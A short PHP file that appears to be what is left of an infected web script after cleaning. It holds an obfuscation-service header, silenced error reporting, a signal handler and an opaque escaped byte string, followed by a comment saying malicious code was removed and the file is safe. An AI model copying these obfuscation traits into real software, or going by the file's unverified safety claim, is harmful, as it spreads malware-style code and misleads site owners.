<?php

/***
Encryptor by      :https://en.yenpro.net
Obfuscated Version: 1.0
Description       : Copyright by En.YenPro.Net
Obfuscated Day    : 2023-05-27 16:17:29
UserAgent         : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Ip                : 162.158.107.44
Encryptor by      :https://en.yenpro.net
***/


error_reporting(0);

if (function_exists("pcntl_signal") && is_callable("signal")) {
	pcntl_signal(SIGCHLD, SIG_IGN);
}

// * std::HashMd5 1

$HashMd5 = "\372\130\171\x59\x73\256\101\311\246\x61\x37\101\x69\220\224\xb1\60\xbc\321\x51\225\x32\x61\305\346\227\x9d\x58\x5a\xd6\x65\235";


/**
 * Note: This file may contain artifacts of previous malicious infection.
 * However, the dangerous code has been removed, and the file is now safe to use.
 */

